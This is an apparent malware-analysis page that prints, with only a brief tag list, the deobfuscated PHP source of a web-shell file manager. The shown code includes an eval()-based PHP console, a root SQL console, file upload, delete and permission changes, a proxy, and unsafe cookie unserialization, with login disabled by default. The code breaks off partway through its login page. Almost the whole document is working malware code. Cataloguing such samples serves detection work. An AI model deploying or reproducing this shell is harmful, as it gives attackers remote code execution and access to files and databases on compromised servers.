PHP Malware Analysis

Back to list

Tags

Encoding
base64_decode
base64_encode
URLs
www.cdolivet.com
https://github.com/Den1xxx/Filemanager
http://www.w3.org/TR/REC-html40
http://reloadcms.com
Title
' . __('File manager') . '
Execution
eval
Input
_GET
_POST
Environment
set_time_limit

Deobfuscated code

<?php

/* PHP File manager ver 1.2 */
// Configuration — do not change manually!
$authorization = '{"authorize":"0","login":"admin","password":"phpfm","cookie_name":"fm_user","days_authorization":"30","script":"<script type=\\"text\\/javascript\\" src=\\"http:\\/\\/www.cdolivet.com\\/editarea\\/editarea\\/edit_area\\/edit_area_full.js\\"><\\/script>\\r\\n<script language=\\"Javascript\\" type=\\"text\\/javascript\\">\\r\\neditAreaLoader.init({\\r\\nid: \\"newcontent\\"\\r\\n,display: \\"later\\"\\r\\n,start_highlight: true\\r\\n,allow_resize: \\"both\\"\\r\\n,allow_toggle: true\\r\\n,word_wrap: true\\r\\n,language: \\"ru\\"\\r\\n,syntax: \\"php\\"\\t\\r\\n,toolbar: \\"search, go_to_line, |, undo, redo, |, select_font, |, syntax_selection, |, change_smooth_selection, highlight, reset_highlight, |, help\\"\\r\\n,syntax_selection_allow: \\"css,html,js,php,python,xml,c,cpp,sql,basic,pas\\"\\r\\n});\\r\\n<\\/script>"}';
$php_templates = '{"Settings":"global $fm_config;\\r\\nvar_export($fm_config);","Backup SQL tables":"echo fm_backup_tables();"}';
$sql_templates = '{"All bases":"SHOW DATABASES;","All tables":"SHOW TABLES;"}';
// end configuration
// Preparations
$starttime = explode(' ', microtime());
$starttime = $starttime[1] + $starttime[0];
$langs = array('en', 'ru', 'de', 'fr', 'uk');
$path = empty($_REQUEST['path']) ? $path = realpath('.') : realpath($_REQUEST['path']);
$path = str_replace('\\', '/', $path) . '/';
$main_path = str_replace('\\', '/', realpath('./'));
$phar_maybe = version_compare(phpversion(), "5.3.0", "<") ? true : false;
$msg = '';
// service string
$default_language = 'ru';
$detect_lang = true;
$fm_version = 1.1;
//Authorization
$auth = json_decode($authorization, true);
$auth['authorize'] = isset($auth['authorize']) ? $auth['authorize'] : 0;
$auth['days_authorization'] = isset($auth['days_authorization']) && is_numeric($auth['days_authorization']) ? (int) $auth['days_authorization'] : 30;
$auth['login'] = isset($auth['login']) ? $auth['login'] : 'admin';
$auth['password'] = isset($auth['password']) ? $auth['password'] : 'phpfm';
$auth['cookie_name'] = isset($auth['cookie_name']) ? $auth['cookie_name'] : 'fm_user';
$auth['script'] = isset($auth['script']) ? $auth['script'] : '';
// Little default config
$fm_default_config = array(
    'make_directory' => true,
    'new_file' => true,
    'upload_file' => true,
    'show_dir_size' => false,
    //if true, show directory size → maybe slow
    'show_img' => true,
    'show_php_ver' => true,
    'show_php_ini' => false,
    // show path to current php.ini
    'show_gt' => true,
    // show generation time
    'enable_php_console' => true,
    'enable_sql_console' => true,
    'sql_server' => 'localhost',
    'sql_username' => 'root',
    'sql_password' => '',
    'sql_db' => 'test_base',
    'enable_proxy' => true,
    'show_phpinfo' => true,
    'show_xls' => true,
    'fm_settings' => true,
);
if (empty($_COOKIE['fm_config'])) {
    $fm_config = $fm_default_config;
} else {
    $fm_config = unserialize($_COOKIE['fm_config']);
}
// Change language
if (isset($_POST['fm_lang'])) {
    setcookie('fm_lang', $_POST['fm_lang'], time() + 86400 * $auth['days_authorization']);
    $_COOKIE['fm_lang'] = $_POST['fm_lang'];
}
$language = $default_language;
// Detect browser language
if ($detect_lang && !empty($_SERVER['HTTP_ACCEPT_LANGUAGE']) && empty($_COOKIE['fm_lang'])) {
    $lang_priority = explode(',', $_SERVER['HTTP_ACCEPT_LANGUAGE']);
    if (!empty($lang_priority)) {
        foreach ($lang_priority as $lang_arr) {
            $lng = explode(';', $lang_arr);
            $lng = $lng[0];
            if (in_array($lng, $langs)) {
                $language = $lng;
                break;
            }
        }
    }
}
// Cookie language is primary for ever
$language = empty($_COOKIE['fm_lang']) ? $language : $_COOKIE['fm_lang'];
// Localization
if ($language == 'ru') {
    $lang['Add'] = 'Добавить';
    $lang['Are you sure you want to delete this directory (recursively)?'] = 'Вы уверены, что хотите удалить эту папку (рекурсивно)?';
    $lang['Are you sure you want to delete this file?'] = 'Вы уверены, что хотите удалить этот файл?';
    $lang['Archiving'] = 'Архивировать';
    $lang['Authorization'] = 'Авторизация';
    $lang['Back'] = 'Назад';
    $lang['Cancel'] = 'Отмена';
    $lang['Chinese'] = 'Китайский';
    $lang['Compress'] = 'Сжать';
    $lang['Console'] = 'Консоль';
    $lang['Cookie'] = 'Куки';
    $lang['Created'] = 'Создан';
    $lang['Date'] = 'Дата';
    $lang['Days'] = 'Дней';
    $lang['Decompress'] = 'Распаковать';
    $lang['Delete'] = 'Удалить';
    $lang['Deleted'] = 'Удалено';
    $lang['Download'] = 'Скачать';
    $lang['done'] = 'закончена';
    $lang['Edit'] = 'Редактировать';
    $lang['Enter'] = 'Вход';
    $lang['English'] = 'Английский';
    $lang['Error occurred'] = 'Произошла ошибка';
    $lang['File manager'] = 'Файловый менеджер';
    $lang['File selected'] = 'Выбран файл';
    $lang['File updated'] = 'Файл сохранен';
    $lang['Filename'] = 'Имя файла';
    $lang['Files uploaded'] = 'Файл загружен';
    $lang['French'] = 'Французский';
    $lang['German'] = 'Немецкий';
    $lang['Generation time'] = 'Генерация страницы';
    $lang['Home'] = 'Домой';
    $lang['Quit'] = 'Выход';
    $lang['Language'] = 'Язык';
    $lang['Login'] = 'Логин';
    $lang['Manage'] = 'Управление';
    $lang['Make directory'] = 'Создать папку';
    $lang['Name'] = 'Наименование';
    $lang['New'] = 'Новое';
    $lang['New file'] = 'Новый файл';
    $lang['no files'] = 'нет файлов';
    $lang['Password'] = 'Пароль';
    $lang['pictures'] = 'изображения';
    $lang['Recursively'] = 'Рекурсивно';
    $lang['Rename'] = 'Переименовать';
    $lang['Reset'] = 'Сбросить';
    $lang['Reset settings'] = 'Сбросить настройки';
    $lang['Result'] = 'Результат';
    $lang['Rights'] = 'Права';
    $lang['Russian'] = 'Русский';
    $lang['Save'] = 'Сохранить';
    $lang['Select'] = 'Выберите';
    $lang['Select the file'] = 'Выберите файл';
    $lang['Settings'] = 'Настройка';
    $lang['Show'] = 'Показать';
    $lang['Size'] = 'Размер';
    $lang['Spanish'] = 'Испанский';
    $lang['Submit'] = 'Отправить';
    $lang['Task'] = 'Задача';
    $lang['templates'] = 'шаблоны';
    $lang['Show size of the folder'] = 'Показать размер папки';
    $lang['Ukrainian'] = 'Украинский';
    $lang['Upload'] = 'Загрузить';
    $lang['Value'] = 'Значение';
    $lang['Hello'] = 'Привет';
} elseif ($language == 'de') {
    $lang['Add'] = 'Add';
    $lang['Are you sure you want to delete this directory (recursively)'] = 'Sind Sie sicher, dass Sie diesen Ordner löschen möchten (rekursiv)?';
    $lang['Are you sure you want to delete this file?'] = 'Sind Sie sicher, dass Sie diese Datei löschen möchten?';
    $lang['Archiving'] = 'Archivierung';
    $lang['Authorization'] = 'Genehmigung';
    $lang['Back'] = 'Zurück';
    $lang['Cancel'] = 'Abbrechen';
    $lang['Chinese'] = 'Chinesische';
    $lang['Compress'] = 'Compress';
    $lang['Console'] = 'Console';
    $lang['Cookie'] = 'Cookie';
    $lang['Created'] = 'Erstellt';
    $lang['Date'] = 'Datum';
    $lang['Days'] = 'Tage';
    $lang['Decompress'] = 'Extract';
    $lang['Delete'] = 'Löschen';
    $lang['Deleted'] = 'Gelöschte';
    $lang['Download'] = 'Laden';
    $lang['done'] = 'fertig';
    $lang['Edit'] = 'Bearbeiten';
    $lang['Enter'] = 'Eintrag';
    $lang['Englisch'] = 'Englisch';
    $lang['Error occurred'] = 'Ein Fehler ist aufgetreten';
    $lang['File manager'] = 'Datei Manager';
    $lang['File selected'] = 'Die ausgewählte Datei';
    $lang['File updated'] = 'Die Datei wird gespeichert';
    $lang['Filename'] = 'Dateiname';
    $lang['Files uploaded'] = 'Datei hochgeladen';
    $lang['French'] = 'Französisch';
    $lang['Generation time'] = 'Generation Zeit';
    $lang['German'] = 'Deutche';
    $lang['Home'] = 'Home';
    $lang['Quit'] = 'Abmelden';
    $lang['Language'] = 'Sprache';
    $lang['Login'] = 'Login';
    $lang['Manage'] = 'Management';
    $lang['Make directory'] = 'Neuer Ordner';
    $lang['Name'] = 'Name';
    $lang['New'] = 'Neu';
    $lang['New file'] = 'Neue Datei';
    $lang['no files'] = 'keine Dateien';
    $lang['Password'] = 'Passwort';
    $lang['pictures'] = 'Bilder';
    $lang['Recursively'] = 'rekursive';
    $lang['Reset'] = 'Zurücksetzen';
    $lang['Rename'] = 'Umbenennen';
    $lang['Reset settings'] = 'Einstellungen zurücksetzen';
    $lang['Result'] = 'Result';
    $lang['Ergebnis'] = 'Ergebnis';
    $lang['Rights'] = 'Rechte';
    $lang['Russian'] = 'Russisch';
    $lang['Save'] = 'Speichern';
    $lang['Select'] = 'Wählen';
    $lang['Select the file'] = 'Wählen Sie die Datei';
    $lang['Settings'] = 'Einstellungen';
    $lang['Show'] = 'Show';
    $lang['Show size of the folder'] = 'Größe des Ordners anzeigen';
    $lang['Size'] = 'Größe';
    $lang['Spanish'] = 'Spanisch';
    $lang['Submit'] = 'Senden';
    $lang['Task'] = 'Aufgabe';
    $lang['templates'] = 'Vorlagen';
    $lang['Ukrainian'] = 'Ukrainisch';
    $lang['Upload'] = 'Upload';
    $lang['Value'] = 'Wert';
    $lang['Hello'] = 'Hallo';
} elseif ($language == 'fr') {
    $lang['Add'] = 'Ajouter';
    $lang['Are you sure you want to delete this directory (recursively)?'] = 'Êtes-vous sûr de vouloir supprimer ce dossier (récursive)?';
    $lang['Are you sure you want to delete this file?'] = 'Êtes-vous sûr de vouloir supprimer ce fichier?';
    $lang['Archiving'] = 'Archives';
    $lang['Authorization'] = 'Autorisation';
    $lang['Back'] = 'Arrière';
    $lang['Cancel'] = 'annulation';
    $lang['Chinese'] = 'Chinois';
    $lang['Compress'] = 'Presser';
    $lang['Console'] = 'Console';
    $lang['Cookie'] = 'Cookie';
    $lang['Created'] = 'Êtabli';
    $lang['Date'] = 'La date';
    $lang['Days'] = 'Journées';
    $lang['Decompress'] = 'Décompresser';
    $lang['Delete'] = 'Supprimer';
    $lang['Deleted'] = 'Supprimé';
    $lang['Download'] = 'Télécharger';
    $lang['done'] = 'terminé';
    $lang['Edit'] = 'Editer';
    $lang['Enter'] = 'Entrée';
    $lang['English'] = 'Anglais';
    $lang['Error occurred'] = 'Une erreur est survenue';
    $lang['File manager'] = 'Gestionnaire de fichiers';
    $lang['File selected'] = 'Fichier sélectionné';
    $lang['File updated'] = 'Le fichier est enregistré';
    $lang['Filename'] = 'Nom du fichier';
    $lang['Files uploaded'] = 'Fichiers uploadés';
    $lang['French'] = 'Française';
    $lang['Generation time'] = 'Génération de la page';
    $lang['German'] = 'Allemand';
    $lang['Home'] = 'Home';
    $lang['Quit'] = 'Quitter';
    $lang['Language'] = 'Langue';
    $lang['Login'] = 'Connexion';
    $lang['Manage'] = 'Gestion';
    $lang['Make directory'] = 'Nouveau dossier';
    $lang['Name'] = 'Nom';
    $lang['New'] = 'Nouveau';
    $lang['New file'] = 'Nouveau fichier';
    $lang['no files'] = 'aucun fichier';
    $lang['Password'] = 'Mot de passe';
    $lang['pictures'] = 'des photos';
    $lang['Recursively'] = 'Récursive';
    $lang['Rename'] = 'Renommer';
    $lang['Reset'] = 'Réinitialiser';
    $lang['Reset settings'] = 'Réinitialiser les paramètres';
    $lang['Result'] = 'Résultat';
    $lang['Rights'] = 'Permissions';
    $lang['Russian'] = 'Russe';
    $lang['Save'] = 'Enregistrer';
    $lang['Select'] = 'Sélectionnez';
    $lang['Select the file'] = 'Sélectionnez le fichier';
    $lang['Settings'] = 'Réglages';
    $lang['Show'] = 'Show';
    $lang['Show size of the folder'] = 'Afficher la taille du dossier';
    $lang['Size'] = 'Taille';
    $lang['Spanish'] = 'Espagnol';
    $lang['Submit'] = 'Envoyer';
    $lang['Task'] = 'Tâche';
    $lang['templates'] = 'templates';
    $lang['Ukrainian'] = 'Ukrainien';
    $lang['Upload'] = 'Télécharger';
    $lang['Value'] = 'Valeur';
    $lang['Hello'] = 'Bonjour';
} else {
    if ($language == 'uk') {
        $lang['Add'] = 'Додати';
        $lang['Are you sure you want to delete this directory (recursively)?'] = 'Ви впевнені, що бажаєте видалити цю папку (рекурсивно)?';
        $lang['Are you sure you want to delete this file?'] = 'Ви впевнені, що бажаєте видалити цей файл?';
        $lang['Archiving'] = 'Архівувати';
        $lang['Authorization'] = 'Авторизація';
        $lang['Back'] = 'Назад';
        $lang['Cancel'] = 'Відміна';
        $lang['Chinese'] = 'Китайська';
        $lang['Compress'] = 'Сжати';
        $lang['Console'] = 'Консоль';
        $lang['Cookie'] = 'Кукi';
        $lang['Created'] = 'Створений';
        $lang['Date'] = 'Дата';
        $lang['Date'] = 'Днiв';
        $lang['Decompress'] = 'Розпакувати';
        $lang['Delete'] = 'Видалити';
        $lang['Deleted'] = 'Видалено';
        $lang['Download'] = 'Скачати';
        $lang['done'] = 'закінчено';
        $lang['Edit'] = 'Редагувати';
        $lang['Enter'] = 'Вхід';
        $lang['English'] = 'Англійська';
        $lang['Error occurred'] = 'Виникла помилка';
        $lang['File manager'] = 'Файловий менеджер';
        $lang['File selected'] = 'Обрано файл';
        $lang['File updated'] = 'Файл збережено';
        $lang['Filename'] = 'Им\'я файла';
        $lang['Files uploaded'] = 'Файл завантажено';
        $lang['French'] = 'Французська';
        $lang['Generation time'] = 'Генерація сторінки';
        $lang['German'] = 'Німецька';
        $lang['Home'] = 'Додому';
        $lang['Quit'] = 'Вихід';
        $lang['Language'] = 'Мова';
        $lang['Login'] = 'Логін';
        $lang['Manage'] = 'Управління';
        $lang['Make directory'] = 'Створити папку';
        $lang['Name'] = 'Найменування';
        $lang['New'] = 'Нове';
        $lang['New file'] = 'Новий файл';
        $lang['no files'] = 'немає файлів';
        $lang['Password'] = 'Пароль';
        $lang['pictures'] = 'фотографії';
        $lang['Recursively'] = 'Рекурсивно';
        $lang['Rename'] = 'Перейменувати';
        $lang['Reset'] = 'Скидання';
        $lang['Reset settings'] = 'Скинути налаштування';
        $lang['Result'] = 'Результат';
        $lang['Rights'] = 'Права';
        $lang['Russian'] = 'Російська';
        $lang['Save'] = 'Зберегти';
        $lang['Select'] = 'Виберіть';
        $lang['Select the file'] = 'Виберіть файл';
        $lang['Settings'] = 'Налаштування';
        $lang['Show'] = 'Показати';
        $lang['Show size of the folder'] = 'Показати розмір папки';
        $lang['Size'] = 'Розмір';
        $lang['Spanish'] = 'Іспанська';
        $lang['Submit'] = 'Відправити';
        $lang['Task'] = 'Завдання';
        $lang['templates'] = 'шаблони';
        $lang['Ukrainian'] = 'Українська';
        $lang['Upload'] = 'Завантажити';
        $lang['Value'] = 'Значення';
        $lang['Hello'] = 'Вітаю';
    }
}
/* Functions */
//translation
function __($text)
{
    global $lang;
    if (isset($lang[$text])) {
        return $lang[$text];
    } else {
        return $text;
    }
}
//delete files and dirs recursively
function fm_del_files($file, $recursive = false)
{
    if ($recursive && @is_dir($file)) {
        $els = fm_scan_dir($file, '', '', true);
        foreach ($els as $el) {
            if ($el != '.' && $el != '..') {
                fm_del_files($file . '/' . $el, true);
            }
        }
    }
    if (@is_dir($file)) {
        return rmdir($file);
    } else {
        return @unlink($file);
    }
}
//file perms
function fm_rights_string($file, $if = false)
{
    $perms = fileperms($file);
    $info = '';
    if (!$if) {
        if (($perms & 0xc000) == 0xc000) {
            //Socket
            $info = 's';
        } elseif (($perms & 0xa000) == 0xa000) {
            //Symbolic Link
            $info = 'l';
        } elseif (($perms & 0x8000) == 0x8000) {
            //Regular
            $info = '-';
        } elseif (($perms & 0x6000) == 0x6000) {
            //Block special
            $info = 'b';
        } elseif (($perms & 0x4000) == 0x4000) {
            //Directory
            $info = 'd';
        } elseif (($perms & 0x2000) == 0x2000) {
            //Character special
            $info = 'c';
        } elseif (($perms & 0x1000) == 0x1000) {
            //FIFO pipe
            $info = 'p';
        } else {
            //Unknown
            $info = 'u';
        }
    }
    $info .= $perms & 0x100 ? 'r' : '-';
    $info .= $perms & 0x80 ? 'w' : '-';
    $info .= $perms & 0x40 ? $perms & 0x800 ? 's' : 'x' : ($perms & 0x800 ? 'S' : '-');
    $info .= $perms & 0x20 ? 'r' : '-';
    $info .= $perms & 0x10 ? 'w' : '-';
    $info .= $perms & 0x8 ? $perms & 0x400 ? 's' : 'x' : ($perms & 0x400 ? 'S' : '-');
    $info .= $perms & 0x4 ? 'r' : '-';
    $info .= $perms & 0x2 ? 'w' : '-';
    $info .= $perms & 0x1 ? $perms & 0x200 ? 't' : 'x' : ($perms & 0x200 ? 'T' : '-');
    return $info;
}
function fm_convert_rights($mode)
{
    $mode = str_pad($mode, 9, '-');
    $trans = array('-' => '0', 'r' => '4', 'w' => '2', 'x' => '1');
    $mode = strtr($mode, $trans);
    $newmode = '0';
    $owner = (int) $mode[0] + (int) $mode[1] + (int) $mode[2];
    $group = (int) $mode[3] + (int) $mode[4] + (int) $mode[5];
    $world = (int) $mode[6] + (int) $mode[7] + (int) $mode[8];
    $newmode .= $owner . $group . $world;
    return intval($newmode, 8);
}
function fm_chmod($file, $val, $rec = false)
{
    $res = @chmod(realpath($file), $val);
    if (@is_dir($file) && $rec) {
        $els = fm_scan_dir($file);
        foreach ($els as $el) {
            $res = $res && fm_chmod($file . '/' . $el, $val, true);
        }
    }
    return $res;
}
//load files
function fm_download($file_name)
{
    if (!empty($file_name)) {
        if (file_exists($file_name)) {
            header("Content-Disposition: attachment; filename=" . basename($file_name));
            header("Content-Type: application/force-download");
            header("Content-Type: application/octet-stream");
            header("Content-Type: application/download");
            header("Content-Description: File Transfer");
            header("Content-Length: " . filesize($file_name));
            flush();
            // this doesn't really matter.
            $fp = fopen($file_name, "r");
            while (!feof($fp)) {
                echo fread($fp, 65536);
                flush();
                // this is essential for large downloads
            }
            fclose($fp);
            die;
        } else {
            header('HTTP/1.0 404 Not Found', true, 404);
            header('Status: 404 Not Found');
            die;
        }
    }
}
//show folder size
function fm_dir_size($f, $format = true)
{
    if ($format) {
        $size = fm_dir_size($f, false);
        if ($size <= 1024) {
            return $size . ' bytes';
        } elseif ($size <= 1048576) {
            return round($size / 1024, 2) . '&nbsp;Kb';
        } elseif ($size <= 1073741824) {
            return round($size / 1048576, 2) . '&nbsp;Mb';
        } elseif ($size <= 1099511627776) {
            return round($size / 1073741824, 2) . '&nbsp;Gb';
        } elseif ($size <= 1125899906842624) {
            return round($size / 1099511627776, 2) . '&nbsp;Tb';
        } else {
            return round($size / 1125899906842624, 2) . '&nbsp;Pb';
        }
        // ;-)
    } else {
        if (is_file($f)) {
            return filesize($f);
        }
        $size = 0;
        $dh = opendir($f);
        while (($file = readdir($dh)) !== false) {
            if ($file == '.' || $file == '..') {
                continue;
            }
            if (is_file($f . '/' . $file)) {
                $size += filesize($f . '/' . $file);
            } else {
                $size += fm_dir_size($f . '/' . $file, false);
            }
        }
        closedir($dh);
        return $size + filesize($f);
    }
}
//scan directory
function fm_scan_dir($directory, $exp = '', $type = 'all', $do_not_filter = false)
{
    $dir = $ndir = array();
    if (!empty($exp)) {
        $exp = '/^' . str_replace('*', '(.*)', str_replace('.', '\\.', $exp)) . '$/';
    }
    if (!empty($type) && $type !== 'all') {
        $func = 'is_' . $type;
    }
    if (@is_dir($directory)) {
        $fh = opendir($directory);
        while (false !== ($filename = readdir($fh))) {
            if (substr($filename, 0, 1) != '.' || $do_not_filter) {
                if ((empty($type) || $type == 'all' || $func($directory . '/' . $filename)) && (empty($exp) || preg_match($exp, $filename))) {
                    $dir[] = $filename;
                }
            }
        }
        closedir($fh);
        natsort($dir);
    }
    return $dir;
}
function fm_link($get, $link, $name, $title = '')
{
    if (empty($title)) {
        $title = $name . ' ' . basename($link);
    }
    return '&nbsp;&nbsp;<a href="?' . $get . '=' . base64_encode($link) . '" title="' . $title . '">' . $name . '</a>';
}
function fm_arr_to_option($arr, $n, $sel = '')
{
    foreach ($arr as $v) {
        $b = $v[$n];
        $res .= '<option value="' . $b . '" ' . ($sel && $sel == $b ? 'selected' : '') . '>' . $b . '</option>';
    }
    return $res;
}
function fm_lang_form($current = 'en')
{
    return '
<form name="change_lang" method="post" action="">
	<select name="fm_lang" title="' . __('Language') . '" onchange="document.forms[\'change_lang\'].submit()" >
		<option value="en" ' . ($current == 'en' ? 'selected="selected" ' : '') . '>' . __('English') . '</option>
		<option value="de" ' . ($current == 'de' ? 'selected="selected" ' : '') . '>' . __('German') . '</option>
		<option value="ru" ' . ($current == 'ru' ? 'selected="selected" ' : '') . '>' . __('Russian') . '</option>
		<option value="fr" ' . ($current == 'fr' ? 'selected="selected" ' : '') . '>' . __('French') . '</option>
		<option value="uk" ' . ($current == 'uk' ? 'selected="selected" ' : '') . '>' . __('Ukrainian') . '</option>
	</select>
</form>
';
}
function fm_root($dirname)
{
    return $dirname == '.' or $dirname == '..';
}
function fm_php($string)
{
    $display_errors = ini_get('display_errors');
    ini_set('display_errors', '1');
    ob_start();
    eval(trim($string));
    $text = ob_get_contents();
    ob_end_clean();
    ini_set('display_errors', $display_errors);
    return $text;
}
//SHOW DATABASES
function fm_sql_connect()
{
    global $fm_config;
    return new mysqli($fm_config['sql_server'], $fm_config['sql_username'], $fm_config['sql_password'], $fm_config['sql_db']);
}
function fm_sql($query)
{
    global $fm_config;
    $query = trim($query);
    ob_start();
    $connection = fm_sql_connect();
    if ($connection->connect_error) {
        ob_end_clean();
        return $connection->connect_error;
    }
    $connection->set_charset('utf8');
    $queried = mysqli_query($connection, $query);
    if ($queried === false) {
        ob_end_clean();
        return mysqli_error($connection);
    } else {
        if (!empty($queried)) {
            while ($row = mysqli_fetch_assoc($queried)) {
                $query_result[] = $row;
            }
        }
        $vdump = empty($query_result) ? '' : var_export($query_result, true);
        ob_end_clean();
        $connection->close();
        return '<pre>' . stripslashes($vdump) . '</pre>';
    }
}
function fm_backup_tables($tables = '*', $full_backup = true)
{
    global $path;
    $mysqldb = fm_sql_connect();
    $delimiter = "; \n  \n";
    if ($tables == '*') {
        $tables = array();
        $result = $mysqldb->query('SHOW TABLES');
        while ($row = mysqli_fetch_row($result)) {
            $tables[] = $row[0];
        }
    } else {
        $tables = is_array($tables) ? $tables : explode(',', $tables);
    }
    $return = '';
    foreach ($tables as $table) {
        $result = $mysqldb->query('SELECT * FROM ' . $table);
        $num_fields = mysqli_num_fields($result);
        $return .= 'DROP TABLE IF EXISTS `' . $table . '`' . $delimiter;
        $row2 = mysqli_fetch_row($mysqldb->query('SHOW CREATE TABLE ' . $table));
        $return .= $row2[1] . $delimiter;
        if ($full_backup) {
            for ($i = 0; $i < $num_fields; $i++) {
                while ($row = mysqli_fetch_row($result)) {
                    $return .= 'INSERT INTO `' . $table . '` VALUES(';
                    for ($j = 0; $j < $num_fields; $j++) {
                        $row[$j] = addslashes($row[$j]);
                        $row[$j] = str_replace("\n", "\\n", $row[$j]);
                        if (isset($row[$j])) {
                            $return .= '"' . $row[$j] . '"';
                        } else {
                            $return .= '""';
                        }
                        if ($j < $num_fields - 1) {
                            $return .= ',';
                        }
                    }
                    $return .= ')' . $delimiter;
                }
            }
        } else {
            $return = preg_replace("#AUTO_INCREMENT=[\\d]+ #is", '', $return);
        }
        $return .= "\n\n\n";
    }
    //save file
    $file = gmdate("Y-m-d_H-i-s", time()) . '.sql';
    $handle = fopen($file, 'w+');
    fwrite($handle, $return);
    fclose($handle);
    $alert = 'onClick="if(confirm(\'' . __('File selected') . ': \\n' . $file . '. \\n' . __('Are you sure you want to delete this file?') . '\')) document.location.href = \'?delete=' . $file . '&path=' . $path . '\'"';
    return $file . ': ' . fm_link('download', $path . $file, __('Download'), __('Download') . ' ' . $file) . ' <a href="#" title="' . __('Delete') . ' ' . $file . '" ' . $alert . '>' . __('Delete') . '</a>';
}
function fm_restore_tables($sqlFileToExecute)
{
    $mysqldb = fm_sql_connect();
    $delimiter = "; \n  \n";
    // Load and explode the sql file
    $f = fopen($sqlFileToExecute, "r+");
    $sqlFile = fread($f, filesize($sqlFileToExecute));
    $sqlArray = explode($delimiter, $sqlFile);
    //Process the sql file by statements
    foreach ($sqlArray as $stmt) {
        if (strlen($stmt) > 3) {
            $result = $mysqldb->query($stmt);
            if (!$result) {
                $sqlErrorCode = mysqli_errno($mysqldb->connection);
                $sqlErrorText = mysqli_error($mysqldb->connection);
                $sqlStmt = $stmt;
                break;
            }
        }
    }
    if (empty($sqlErrorCode)) {
        return __('Success') . ' — ' . $sqlFileToExecute;
    } else {
        return $sqlErrorText . '<br/>' . $stmt;
    }
}
function fm_img_link($filename)
{
    return './' . basename("/var/www/html/input.php") . '?img=' . base64_encode($filename);
}
function fm_home_style()
{
    return '

input, input.fm_input {
	text-indent: 2px;
}

input, textarea, select, input.fm_input {
	color: black;
	font: normal 8pt Verdana, Arial, Helvetica, sans-serif;
	border-color: black;
	background-color: #FCFCFC none !important;
	border-radius: 0;
	padding: 2px;
}

input.fm_input {
	background: #FCFCFC none !important;
	cursor: pointer;
}

.home {
	background-image: url("");
	background-repeat: no-repeat;
}';
}
function fm_config_checkbox_row($name, $value)
{
    global $fm_config;
    return '<tr><td class="row1"><input id="fm_config_' . $value . '" name="fm_config[' . $value . ']" value="1" ' . (empty($fm_config[$value]) ? '' : 'checked="true"') . ' type="checkbox"></td><td class="row2 whole"><label for="fm_config_' . $value . '">' . $name . '</td></tr>';
}
function fm_protocol()
{
    if (isset($_SERVER['HTTP_SCHEME'])) {
        return $_SERVER['HTTP_SCHEME'] . '://';
    }
    if (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') {
        return 'https://';
    }
    if (isset($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == 443) {
        return 'https://';
    }
    if (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') {
        return 'https://';
    }
    return 'http://';
}
function fm_site_url()
{
    return fm_protocol() . $_SERVER['HTTP_HOST'];
}
function fm_url($full = false)
{
    $host = $full ? fm_site_url() : '.';
    return $host . '/' . basename("/var/www/html/input.php");
}
function fm_home($full = false)
{
    return '&nbsp;<a href="' . fm_url($full) . '" title="' . __('Home') . '"><span class="home">&nbsp;&nbsp;&nbsp;&nbsp;</span></a>';
}
function fm_run_input($lng)
{
    global $fm_config;
    $return = !empty($fm_config['enable_' . $lng . '_console']) ? '
				<form  method="post" action="' . fm_url() . '" style="display:inline">
				<input type="submit" name="' . $lng . 'run" value="' . strtoupper($lng) . ' ' . __('Console') . '">
				</form>
' : '';
    return $return;
}
function fm_url_proxy($matches)
{
    $link = str_replace('&amp;', '&', $matches[2]);
    $url = isset($_GET['url']) ? $_GET['url'] : '';
    $parse_url = parse_url($url);
    $host = $parse_url['scheme'] . '://' . $parse_url['host'] . '/';
    if (substr($link, 0, 2) == '//') {
        $link = substr_replace($link, fm_protocol(), 0, 2);
    } elseif (substr($link, 0, 1) == '/') {
        $link = substr_replace($link, $host, 0, 1);
    } elseif (substr($link, 0, 2) == './') {
        $link = substr_replace($link, $host, 0, 2);
    } elseif (substr($link, 0, 4) == 'http') {
        //alles machen wunderschon
    } else {
        $link = $host . $link;
    }
    if ($matches[1] == 'href' && !strripos($link, 'css')) {
        $base = fm_site_url() . '/' . basename("/var/www/html/input.php");
        $baseq = $base . '?proxy=true&url=';
        $link = $baseq . urlencode($link);
    } elseif (strripos($link, 'css')) {
        //как-то тоже подменять надо
    }
    return $matches[1] . '="' . $link . '"';
}
function fm_tpl_form($lng_tpl)
{
    global ${$lng_tpl . '_templates'};
    $tpl_arr = json_decode(${$lng_tpl . '_templates'}, true);
    $str = '';
    foreach ($tpl_arr as $ktpl => $vtpl) {
        $str .= '<tr><td class="row1"><input name="' . $lng_tpl . '_name[]" value="' . $ktpl . '"></td><td class="row2 whole"><textarea name="' . $lng_tpl . '_value[]"  cols="55" rows="5" class="textarea_input">' . $vtpl . '</textarea> <input name="del_' . rand() . '" type="button" onClick="this.parentNode.parentNode.remove();" value="' . __('Delete') . '"/></td></tr>';
    }
    return '
<table>
<tr><th colspan="2">' . strtoupper($lng_tpl) . ' ' . __('templates') . ' ' . fm_run_input($lng_tpl) . '</th></tr>
<form method="post" action="">
<input type="hidden" value="' . $lng_tpl . '" name="tpl_edited">
<tr><td class="row1">' . __('Name') . '</td><td class="row2 whole">' . __('Value') . '</td></tr>
' . $str . '
<tr><td colspan="2" class="row3"><input name="res" type="button" onClick="document.location.href = \'' . fm_url() . '?fm_settings=true\';" value="' . __('Reset') . '"/> <input type="submit" value="' . __('Save') . '" ></td></tr>
</form>
<form method="post" action="">
<input type="hidden" value="' . $lng_tpl . '" name="tpl_edited">
<tr><td class="row1"><input name="' . $lng_tpl . '_new_name" value="" placeholder="' . __('New') . ' ' . __('Name') . '"></td><td class="row2 whole"><textarea name="' . $lng_tpl . '_new_value"  cols="55" rows="5" class="textarea_input" placeholder="' . __('New') . ' ' . __('Value') . '"></textarea></td></tr>
<tr><td colspan="2" class="row3"><input type="submit" value="' . __('Add') . '" ></td></tr>
</form>
</table>
';
}
/* End Functions */
// authorization
if ($auth['authorize']) {
    if (isset($_POST['login']) && isset($_POST['password'])) {
        if ($_POST['login'] == $auth['login'] && $_POST['password'] == $auth['password']) {
            setcookie($auth['cookie_name'], $auth['login'] . '|' . md5($auth['password']), time() + 86400 * $auth['days_authorization']);
            $_COOKIE[$auth['cookie_name']] = $auth['login'] . '|' . md5($auth['password']);
        }
    }
    if (!isset($_COOKIE[$auth['cookie_name']]) or $_COOKIE[$auth['cookie_name']] != $auth['login'] . '|' . md5($auth['password'])) {
        echo '
<!doctype html>
<html>
<head>
<meta charset="utf-8" />
